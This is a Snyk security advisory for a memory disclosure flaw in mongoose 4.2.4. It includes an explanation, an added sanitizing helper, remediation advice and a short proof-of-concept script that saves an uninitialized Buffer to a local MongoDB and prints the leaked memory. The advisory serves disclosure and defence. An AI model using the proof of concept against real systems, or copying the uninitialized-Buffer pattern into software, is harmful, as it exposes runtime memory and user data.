Snyk Description: ## Overview
A potential memory disclosure vulnerability exists in mongoose.
A Buffer field in a MongoDB document can be used to expose sensitive
information such as code, runtime memory and user data into MongoDB.
Details
Initializing a Buffer field in a document with an integer N creates a Buffer
of length N whose memory has not been zeroed out. Example:
```js
var x = new Buffer(100); // uninitialized Buffer of length 100
// vs
var x = new Buffer('100'); // initialized Buffer with value of '100'
```
Initializing a MongoDB document field in this manner will dump uninitialized
memory into MongoDB.
The patch wraps Buffer field initialization in mongoose by converting a number value N to the array [N], so that the Buffer is initialized with N in its
binary form.
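The same number-to-array idea can be applied at the application boundary before a value reaches a Buffer field. The following is an added example, not mongoose's own code or part of the original advisory; `safeBufferCast` and `sanitizeBufferFields` are hypothetical names, and it uses `Buffer.from` instead of the `new Buffer` constructor:

```javascript
// Hypothetical helper (not mongoose's code): cast a value destined for a
// Buffer schema field without ever treating a number as an allocation size.
function safeBufferCast(value) {
  if (Buffer.isBuffer(value)) return value;
  if (typeof value === 'number') {
    // Same idea as the patch described above: N becomes [N], so the result
    // is a single byte holding N, not N bytes of allocated memory.
    return Buffer.from([value]);
  }
  if (typeof value === 'string') return Buffer.from(value, 'utf8');
  if (Array.isArray(value)) {
    // Accept only explicit byte values so nothing is silently coerced.
    if (!value.every((b) => Number.isInteger(b) && b >= 0 && b <= 255)) {
      throw new TypeError('Buffer field array must contain only bytes 0-255');
    }
    return Buffer.from(value);
  }
  throw new TypeError('Unsupported value for Buffer field: ' + typeof value);
}

// Apply the cast to every Buffer-typed field of an untrusted payload
// before it is assigned to a model instance.
function sanitizeBufferFields(payload, bufferFields) {
  const out = { ...payload };
  for (const field of bufferFields) {
    if (Object.prototype.hasOwnProperty.call(out, field)) {
      out[field] = safeBufferCast(out[field]);
    }
  }
  return out;
}

// Constructed sample input: a JSON body in which a client sent a number
// for the Buffer field `data` (field names follow the schema in the PoC).
const body = JSON.parse('{"id":"item1","data":100}');
const clean = sanitizeBufferFields(body, ['data']);
console.log(clean.data.length, clean.data);
```
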
Proof of concept
```js
var mongoose = require('mongoose');
mongoose.connect('mongodb://localhost/bufftest');

// data: Buffer is not uncommon, taken straight from the docs: http://mongoosejs.com/docs/schematypes.html
mongoose.model('Item', new mongoose.Schema({id: String, data: Buffer}));

var Item = mongoose.model('Item');

var sample = new Item();
sample.id = 'item1';

// This will create an uninitialized buffer of size 100
sample.data = 100;
sample.save(function () {
  Item.findOne(function (err, result) {
    // Print out the data (exposed memory)
    console.log(result.data.toString('ascii'))
    mongoose.connection.db.dropDatabase(); // Clean up everything
    process.exit();
  });
});
```
Remediation
Upgrade mongoose to version >= 3.8.39 or >= 4.3.6.
If a direct dependency update is not possible, use snyk wizard to patch this vulnerability.
Package Name: mongoose
Package Version: ['4.2.4']
Package Manager: npm
Target File: package.json
Severity Level: medium
Snyk ID: npm:mongoose:20160116
Snyk CVE: No CVE
Snyk CWE: CWE-201
Link to issue in Snyk: https://app.snyk.io/org/rhicksiii91/project/93ddcac2-4d2c-43e7-b383-b47b30846d11